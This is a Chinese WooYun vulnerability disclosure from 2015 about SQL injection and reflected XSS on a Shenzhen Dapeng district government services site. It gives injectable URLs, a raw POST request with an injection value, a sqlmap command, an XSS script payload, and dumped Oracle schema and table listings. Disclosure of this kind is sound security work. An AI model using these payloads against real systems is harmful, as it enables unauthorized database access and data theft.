当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-097316

漏洞标题:广东省网上办事大厅深圳大鹏分厅Oracle注入

相关厂商:wsbs.dpxq.gov.cn

漏洞作者: 千斤拨四两

提交时间:2015-02-15 16:57

修复时间:2015-04-01 16:58

公开时间:2015-04-01 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-15: 细节已通知厂商并且等待厂商处理中
2015-02-16: 厂商已经确认,细节仅向厂商公开
2015-02-26: 细节向核心白帽子及相关领域专家公开
2015-03-08: 细节向普通白帽子公开
2015-03-18: 细节向实习白帽子公开
2015-04-01: 细节向公众公开

简要描述:

存在多处注入点及反射xss

详细说明:

http://wsbs.dpxq.gov.cn/ 广东省网上办事大厅深圳大鹏分厅

http://wsbs.dpxq.gov.cn/bsdt_detail.jsp?ztmsIndex=1
http://wsbs.dpxq.gov.cn/street/guanxiafanwei.jsp?bguid=1&name=
http://wsbs.dpxq.gov.cn/street/zjfw_detail.jsp?bguid=1&ztmsIndex=89
http://wsbs.dpxq.gov.cn/street/zjfw_detail.jsp?bguid=1


post注入:
POST /approve/supervise/consultation/ConsultationPostAction.do HTTP/1.1
Content-Length: 321
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=AFD64E540B8C8F00722ABC26ACBE51FB
Host: wsbs.dpxq.gov.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Acunetix-Product: WVS/8.0 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
Accept: */*
address=3137%20Laguna%20Street&approveitem=&awb_date=01%2f01%2f1967&bureau=%7bAC100667-0000-0000-0C27-57A500000038%7d&bureauname=&consultationdate=&consultationGUID=1%27%22&content=1&department=1&email=sample%40email.tst&itemtype=person&mobile=1&phone=555-666-0606&randomnumber=0&sex=&status=0&title=Mr.&userName=kbvugpis


sqlmap -r xx.txt --dbs
反射xss:

http://wsbs.dpxq.gov.cn/street/guanxiafanwei.jsp?bguid={AC100667-0000-0000-0D23-32D600000235}&name="/><script>alert("xss")</script>


漏洞证明:

[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EX_BSDT
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] RISEBSDT
[*] RISENETDPSP
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM


sql.png


| WWV_FLOW_JOBS                  |
| WWV_FLOW_JOB_BIND_VALUES       |
| WWV_FLOW_LANGUAGES             |
| WWV_FLOW_LANGUAGE_MAP          |
| WWV_FLOW_LISTS                 |
| WWV_FLOW_LISTS_OF_VALUES$      |
| WWV_FLOW_LIST_ITEMS            |
| WWV_FLOW_LIST_OF_VALUES_DATA   |
| WWV_FLOW_LIST_TEMPLATES        |
| WWV_FLOW_LOCK_PAGE             |
| WWV_FLOW_LOCK_PAGE_LOG         |
| WWV_FLOW_LOV_TEMP              |
| WWV_FLOW_LOV_VALUES            |
| WWV_FLOW_MAIL_ATTACHMENTS      |
| WWV_FLOW_MAIL_LOG              |
| WWV_FLOW_MAIL_QUEUE            |
| WWV_FLOW_MENUS                 |
| WWV_FLOW_MENU_OPTIONS          |
| WWV_FLOW_MENU_TEMPLATES        |
| WWV_FLOW_MESSAGES$             |
| WWV_FLOW_MODELS                |
| WWV_FLOW_MODEL_PAGES           |
| WWV_FLOW_MODEL_PAGE_COLS       |
| WWV_FLOW_MODEL_PAGE_REGIONS    |
| WWV_FLOW_ONLINE_HELP           |
| WWV_FLOW_ONLINE_HELP_JA        |
| WWV_FLOW_PAGES_RESERVED        |
| WWV_FLOW_PAGE_CACHE            |
| WWV_FLOW_PAGE_GENERIC_ATTR     |
| WWV_FLOW_PAGE_GROUPS           |
| WWV_FLOW_PAGE_PLUGS            |
| WWV_FLOW_PAGE_PLUG_TEMPLATES   |
| WWV_FLOW_PAGE_SUBMISSIONS      |
| WWV_FLOW_PASSWORD_HISTORY      |
| WWV_FLOW_PATCHES               |
| WWV_FLOW_PICK_DATABASE_SIZE    |
| WWV_FLOW_PICK_END_USERS        |
| WWV_FLOW_PICK_PAGE_VIEWS       |
| WWV_FLOW_PLATFORM_PREF         |
| WWV_FLOW_PLATFORM_PREFS        |
| WWV_FLOW_POPUP_LOV_TEMPLATE    |
| WWV_FLOW_PREFERENCES$          |
| WWV_FLOW_PROCESSING            |
| WWV_FLOW_PROVISION_COMPANY     |
| WWV_FLOW_PROVISION_SERICE_MOD  |
| WWV_FLOW_PURGED_SESSIONS$      |
| WWV_FLOW_QB_SAVED_COND         |
| WWV_FLOW_QB_SAVED_JOIN         |
| WWV_FLOW_QB_SAVED_QUERY        |
| WWV_FLOW_QB_SAVED_TABS         |
| WWV_FLOW_QUERY_COLUMN          |
| WWV_FLOW_QUERY_CONDITION       |
| WWV_FLOW_QUERY_DEFINITION      |
| WWV_FLOW_QUERY_OBJECT          |
| WWV_FLOW_RANDOM_IMAGES         |
| WWV_FLOW_REGION_CHART_SER_ATTR |
| WWV_FLOW_REGION_REPORT_COLUMN  |
| WWV_FLOW_REGION_REPORT_FILTER  |
| WWV_FLOW_REGION_UPD_RPT_COLS   |
| WWV_FLOW_REPORT_LAYOUTS        |
| WWV_FLOW_REQUEST_VERIFICATIONS |
| WWV_FLOW_REQUIRED_ROLES        |
| WWV_FLOW_RESTRICTED_SCHEMAS    |
| WWV_FLOW_ROW_TEMPLATES         |
| WWV_FLOW_RSCHEMA_EXCEPTIONS    |
| WWV_FLOW_SC_TRANS              |
| WWV_FLOW_SECURITY_SCHEMES      |
| WWV_FLOW_SESSIONS$             |
| WWV_FLOW_SHARED_QRY_SQL_STMTS  |
| WWV_FLOW_SHARED_QUERIES        |
| WWV_FLOW_SHARED_WEB_SERVICES   |
| WWV_FLOW_SHORTCUTS             |
| WWV_FLOW_SHORTCUT_USAGE_MAP    |
| WWV_FLOW_STANDARD_CSS          |
| WWV_FLOW_STANDARD_ICONS        |
| WWV_FLOW_STANDARD_JS           |
| WWV_FLOW_STEPS                 |
| WWV_FLOW_STEP_BRANCHES         |
| WWV_FLOW_STEP_BRANCH_ARGS      |
| WWV_FLOW_STEP_BUTTONS          |
| WWV_FLOW_STEP_COMPUTATIONS     |
| WWV_FLOW_STEP_ITEMS            |
| WWV_FLOW_STEP_ITEM_HELP        |
| WWV_FLOW_STEP_PROCESSING       |
| WWV_FLOW_STEP_VALIDATIONS      |
| WWV_FLOW_SW_BINDS              |
| WWV_FLOW_SW_CREATE_KEYWORDS    |
| WWV_FLOW_SW_DETAIL_RESULTS     |
| WWV_FLOW_SW_MAIN_KEYWORDS      |
| WWV_FLOW_SW_RESULTS            |
| WWV_FLOW_SW_SET_KEYWORDS       |
| WWV_FLOW_SW_SQLPLUS_CMD        |
| WWV_FLOW_SW_SQL_CMDS           |
| WWV_FLOW_SW_STMTS              |
| WWV_FLOW_TABS                  |
| WWV_FLOW_TEMPLATES             |
| WWV_FLOW_TEMPLATES$            |
| WWV_FLOW_TEMPLATE_PREFERENCES  |
| WWV_FLOW_TEMPLATE_THEMES$      |
| WWV_FLOW_TEMP_TABLE            |
| WWV_FLOW_TEMP_TREES            |
| WWV_FLOW_THEMES                |
| WWV_FLOW_TOPLEVEL_TABS         |
| WWV_FLOW_TRANSLATABLE_COLS$    |
| WWV_FLOW_TRANSLATABLE_TEXT$    |
| WWV_FLOW_TREES                 |
| WWV_FLOW_TREE_STATE            |
| WWV_FLOW_UPGRADE_PROGRESS      |
| WWV_FLOW_UPG_COL_NAME_CHANGES  |
| WWV_FLOW_UPG_TAB_NAME_CHANGES  |
| WWV_FLOW_UPG_TAB_OBSOLETE      |
| WWV_FLOW_USER_ACCESS_LOG1$     |
| WWV_FLOW_USER_ACCESS_LOG2$     |
| WWV_FLOW_USER_ACCESS_LOG_NUM$  |
| WWV_FLOW_VERSION$              |
| WWV_FLOW_WEB_PAGES             |
| WWV_FLOW_WEB_PG_LIST_ENTRIES   |
| WWV_FLOW_WEB_PG_REGIONS        |
| WWV_FLOW_WORKSHEETS            |
| WWV_FLOW_WORKSHEET_CATEGORIES  |
| WWV_FLOW_WORKSHEET_COLUMNS     |
| WWV_FLOW_WORKSHEET_COL_GROUPS  |
| WWV_FLOW_WORKSHEET_COMPUTATION |
| WWV_FLOW_WORKSHEET_CONDITIONS  |
| WWV_FLOW_WORKSHEET_DOCS        |
| WWV_FLOW_WORKSHEET_GEOCACHE    |
| WWV_FLOW_WORKSHEET_HISTORY     |
| WWV_FLOW_WORKSHEET_LINKS       |
| WWV_FLOW_WORKSHEET_LOVS        |
| WWV_FLOW_WORKSHEET_LOV_ENTRIES |
| WWV_FLOW_WORKSHEET_PRIVS       |
| WWV_FLOW_WORKSHEET_ROWS        |
| WWV_FLOW_WORKSHEET_RPTS        |
| WWV_FLOW_WORKSHEET_STICK       |
| WWV_FLOW_WORKSPACE_REQ_SIZE    |
| WWV_FLOW_WS_OPERATIONS         |
| WWV_FLOW_WS_PARAMETERS         |
| WWV_FLOW_WS_PROCESS_PARMS_MAP  |
| WWV_MIG_ACCESS                 |
| WWV_MIG_ACC_COLUMNS            |
| WWV_MIG_ACC_FORMS              |
| WWV_MIG_ACC_FORMS_CONTROLS     |
| WWV_MIG_ACC_FORMS_MODULES      |
| WWV_MIG_ACC_FORMS_PERM         |
| WWV_MIG_ACC_GROUPS             |
| WWV_MIG_ACC_GRPSMEMBERS        |
| WWV_MIG_ACC_INDEXES            |
| WWV_MIG_ACC_INDEXES_COLS       |
| WWV_MIG_ACC_MODULES            |
| WWV_MIG_ACC_MODULES_PERM       |
| WWV_MIG_ACC_PAGES              |
| WWV_MIG_ACC_QUERIES            |
| WWV_MIG_ACC_RELATIONS          |
| WWV_MIG_ACC_RELATION_COLS      |
| WWV_MIG_ACC_REPORTS            |
| WWV_MIG_ACC_RPTS_CONTROLS      |
| WWV_MIG_ACC_RPTS_MODULES       |
| WWV_MIG_ACC_RPT_PERMS          |
| WWV_MIG_ACC_TABLES             |
| WWV_MIG_ACC_TAB_PERM           |
| WWV_MIG_ACC_USERS              |
| WWV_MIG_EXPORTER               |
| WWV_MIG_FORMS                  |
| WWV_MIG_FRM_ALERTS             |
| WWV_MIG_FRM_ATTACHEDLIBRARY    |
| WWV_MIG_FRM_BLK_DSA            |
| WWV_MIG_FRM_BLK_DSC            |
| WWV_MIG_FRM_BLK_ITEMS          |
| WWV_MIG_FRM_BLK_ITEM_LIE       |
| WWV_MIG_FRM_BLK_ITEM_RADIO     |
| WWV_MIG_FRM_BLK_ITEM_TRIGGERS  |
| WWV_MIG_FRM_BLK_RELATIONS      |
| WWV_MIG_FRM_BLK_TRIGGERS       |
| WWV_MIG_FRM_BLOCKS             |
| WWV_MIG_FRM_CANVAS             |
| WWV_MIG_FRM_CNVG_COMPOUNDTEXT  |
| WWV_MIG_FRM_CNVS_GRAPHICS      |
| WWV_MIG_FRM_CNVS_TABPAGE       |
| WWV_MIG_FRM_COORDINATES        |
| WWV_MIG_FRM_CPDTXT_TEXTSEGMENT |
| WWV_MIG_FRM_EDITOR             |
| WWV_MIG_FRM_FMB_MENU           |
| WWV_MIG_FRM_FMB_MENUITEM_ROLE  |
| WWV_MIG_FRM_FMB_MENU_MENUITEM  |
| WWV_MIG_FRM_FORMMODULES        |
| WWV_MIG_FRM_LOV                |
| WWV_MIG_FRM_LOVCOLUMNMAPPING   |
| WWV_MIG_FRM_MENU               |
| WWV_MIG_FRM_MENUITEM_ROLE      |
| WWV_MIG_FRM_MENUS              |
| WWV_MIG_FRM_MENUSMODULEROLES   |
| WWV_MIG_FRM_MENUS_MENUMODULES  |
| WWV_MIG_FRM_MENUS_MODULES      |
| WWV_MIG_FRM_MENUS_PROGRAMUNIT  |
| WWV_MIG_FRM_MENU_MENUITEM      |
| WWV_MIG_FRM_MODULEPARAMETER    |
| WWV_MIG_FRM_MODULES            |
| WWV_MIG_FRM_OBJECTGROUP        |
| WWV_MIG_FRM_OBJECTGROUPCHILD   |
| WWV_MIG_FRM_OLB_XMLTAGTABLEMAP |
| WWV_MIG_FRM_PROGRAMUNIT        |
| WWV_MIG_FRM_PROPERTYCLASS      |
| WWV_MIG_FRM_RECORDGROUPCOLUMN  |
| WWV_MIG_FRM_RECORDGROUPS       |
| WWV_MIG_FRM_REPORT             |
| WWV_MIG_FRM_REV_APEX_APP       |
| WWV_MIG_FRM_REV_BLK_ITEMS      |
| WWV_MIG_FRM_REV_BLOCKS         |
| WWV_MIG_FRM_REV_FORMMODULES    |
| WWV_MIG_FRM_REV_LOV            |
| WWV_MIG_FRM_REV_LOVCOLMAPS     |
| WWV_MIG_FRM_TRIGGERS           |
| WWV_MIG_FRM_VISUALATTRIBUTES   |
| WWV_MIG_FRM_WINDOWS            |
| WWV_MIG_FRM_XMLTAGTABLEMAP     |
| WWV_MIG_GENERATED_APPLICATIONS |
| WWV_MIG_MENU_XMLTAGTABLEMAP    |
| WWV_MIG_OLB                    |
| WWV_MIG_OLB_BLK_DATASOURCECOL  |
| WWV_MIG_OLB_BLK_ITEM           |
| WWV_MIG_OLB_BLK_ITEM_LIE       |
| WWV_MIG_OLB_BLK_ITEM_TRIGGER   |
| WWV_MIG_OLB_BLK_TRIGGER        |
| WWV_MIG_OLB_BLOCK              |
| WWV_MIG_OLB_CANVAS             |
| WWV_MIG_OLB_CG_COMPOUNDTEXT    |
| WWV_MIG_OLB_CG_CT_TEXTSEGMENT  |
| WWV_MIG_OLB_CNVS_GRAPHICS      |
| WWV_MIG_OLB_MODULES            |
| WWV_MIG_OLB_OBJECTLIBRARY      |
| WWV_MIG_OLB_OBJECTLIBRARYTAB   |
| WWV_MIG_OLB_OLT_ALERT          |
| WWV_MIG_OLB_OLT_BLK_ITEM       |
| WWV_MIG_OLB_OLT_BLK_ITEM_TRIGR |
| WWV_MIG_OLB_OLT_BLOCK          |
| WWV_MIG_OLB_OLT_CANVAS         |
| WWV_MIG_OLB_OLT_CNVS_GRAPHICS  |
| WWV_MIG_OLB_OLT_GRAPHICS       |
| WWV_MIG_OLB_OLT_ITEM           |
| WWV_MIG_OLB_OLT_MENU           |
| WWV_MIG_OLB_OLT_MENU_MENUITEM  |
| WWV_MIG_OLB_OLT_OBJECTGROUP    |
| WWV_MIG_OLB_OLT_OB_OBJGRPCHILD |
| WWV_MIG_OLB_OLT_REPORT         |
| WWV_MIG_OLB_OLT_TABPAGE        |
| WWV_MIG_OLB_OLT_TABPG_GRAPHICS |
| WWV_MIG_OLB_OLT_VISUALATTRBUTE |
| WWV_MIG_OLB_OLT_WINDOW         |
| WWV_MIG_OLB_PROGRAMUNIT        |
| WWV_MIG_OLB_PROPERTYCLASS      |
| WWV_MIG_OLB_T_TP_GGGGG_CPDTXT  |
| WWV_MIG_OLB_T_TP_GGGGG_CT_TXST |
| WWV_MIG_OLB_T_TP_GGGG_CPDTXT   |
| WWV_MIG_OLB_T_TP_GGGG_CT_TXSGT |
| WWV_MIG_OLB_T_TP_GGGG_GRAPHICS |
| WWV_MIG_OLB_T_TP_GGG_CPDTXT    |
| WWV_MIG_OLB_T_TP_GGG_CT_TXTSGT |
| WWV_MIG_OLB_T_TP_GGG_GRAPHICS  |
| WWV_MIG_OLB_T_TP_GG_CPDTXT     |
| WWV_MIG_OLB_T_TP_GG_CT_TXTSGT  |
| WWV_MIG_OLB_T_TP_GG_GRAPHICS   |
| WWV_MIG_OLB_T_TP_G_GRAPHICS    |
| WWV_MIG_OLB_VISUALATTRIBUTE    |
| WWV_MIG_OLB_WINDOW             |
| WWV_MIG_PLSQL_LIBS             |
| WWV_MIG_PROJECTS               |
| WWV_MIG_PROJECT_COMPONENTS     |
| WWV_MIG_PROJECT_TRIGGERS       |
| WWV_MIG_REPORT                 |
| WWV_MIG_RESERVED_WORDS         |
| WWV_MIG_REV_APEXAPP            |
| WWV_MIG_REV_FORMS              |
| WWV_MIG_REV_QUERIES            |
| WWV_MIG_REV_REPORTS            |
| WWV_MIG_REV_TABLES             |
| WWV_MIG_RPTS                   |
| WWV_MIG_RPT_DATA               |
| WWV_MIG_RPT_DATASRC            |
| WWV_MIG_RPT_DATASRC_GRP        |
| WWV_MIG_RPT_DATASRC_SELECT     |
| WWV_MIG_RPT_DATA_SUMMARY       |
| WWV_MIG_RPT_GRP_DATAITEM       |
| WWV_MIG_RPT_GRP_DATAITEM_DESC  |
| WWV_MIG_RPT_GRP_DATAITEM_PRIV  |
| WWV_MIG_RPT_GRP_FIELD          |
| WWV_MIG_RPT_GRP_FILTER         |
| WWV_MIG_RPT_GRP_FORMULA        |
| WWV_MIG_RPT_GRP_ROWDELIM       |
| WWV_MIG_RPT_GRP_SUMMARY        |
| WWV_MIG_RPT_REPORTPRIVATE      |
| WWV_MIG_RPT_XMLTAGTABLEMAP     |
+--------------------------------+
sqqwe.png


修复方案:

过滤。。。

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-02-16 09:52

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:中
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-02 00:28 | H1d3r ( 路人 | Rank:18 漏洞数:2 |  ‮)

    wvs...